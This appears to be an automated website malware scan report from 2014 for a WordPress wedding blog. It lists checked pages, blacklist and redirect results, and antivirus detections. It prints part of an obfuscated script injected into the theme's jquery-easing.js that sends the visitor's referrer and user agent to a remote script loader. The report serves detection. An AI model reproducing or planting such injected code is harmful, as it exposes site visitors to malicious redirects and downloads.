New scan:

Malware Scanner report for ialwaysknew.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/3
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ialwaysknew.com/
200 OK
Content-Length: 11307
Content-Type: text/html
clean
http://ialwaysknew.com/wp-includes/js/comment-reply.min.js?ver=3.5
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
http://ialwaysknew.com/radars-adventures/
200 OK
Content-Length: 15478
Content-Type: text/html
clean
http://ialwaysknew.com/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://ialwaysknew.com/wp-content/themes/dandelion_v2.6.3/script/jquery.prettyPhoto.js
200 OK
Content-Length: 21810
Content-Type: application/javascript
clean
http://ialwaysknew.com/wp-content/themes/dandelion_v2.6.3/script/jquery.tools.min.js
200 OK
Content-Length: 12445
Content-Type: application/javascript
clean
http://ialwaysknew.com/wp-content/themes/dandelion_v2.6.3/script/script.js
200 OK
Content-Length: 11563
Content-Type: application/javascript
clean
http://ialwaysknew.com/wp-content/themes/dandelion_v2.6.3/script/portfolio-setter.js
200 OK
Content-Length: 8964
Content-Type: application/javascript
clean
http://ialwaysknew.com/wp-content/themes/dandelion_v2.6.3/script/jquery-easing.js
200 OK
Content-Length: 9686
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



jQuery.easing['jswing'] = jQuery.easing['swing'];

jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(t/=d)*t + b;
},
easeOutQuad: function (x, t, b, c, d) {
return -c *(t/=d)*(t-2) + b;
},
easeInOutQuad: function (x, t, b, c, d) {
if ((t/=d/2) <
... 5677 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.Agent.JS.DN
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
TrendMicro
JS_REDIR.FB
Kaspersky
Trojan-Downloader.JS.JScript.ag
Microsoft
Trojan:JS/Redirector.ID
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/Crypted.AG!tr.dldr
PCTools
Trojan.Malscript
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Agent-8
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
F-Prot
JS/Redir.AO
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Commtouch
JS/Redir.AO
Agnitum
JS.Srcid.Gen
BitDefender
Trojan.Agent.JS.DN

http://ialwaysknew.com/traveling-parties/
200 OK
Content-Length: 15443
Content-Type: text/html
clean
http://ialwaysknew.com/registry/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Fri, 30 May 2014 11:03:37 GMT
Pragma: no-cache
Location: http://ialwaysknew.com/wedding/registry/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 01 Jan 1970 00:00:00 GMT
X-Pingback: http://ialwaysknew.com/xmlrpc.php
clean
http://ialwaysknew.com/wedding/registry/
200 OK
Content-Length: 10556
Content-Type: text/html
clean
http://ialwaysknew.com/2012/08/
200 OK
Content-Length: 19281
Content-Type: text/html
clean
http://ialwaysknew.com/our-blog/
200 OK
Content-Length: 32451
Content-Type: text/html
clean
http://ialwaysknew.com/category/keeping-the-love/
200 OK
Content-Length: 21296
Content-Type: text/html
clean
http://ialwaysknew.com/category/wedding-planning/
200 OK
Content-Length: 12945
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ialwaysknew.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 May 2014 11:03:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 11307
Content-Type: text/html; charset=UTF-8
X-Pingback: http://ialwaysknew.com/xmlrpc.php

...11307 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ialwaysknew.com
Referer: http://www.google.com/search?q=ialwaysknew.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ialwaysknew.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ialwaysknew.com/

Result: ialwaysknew.com is not infected or malware details are not published yet.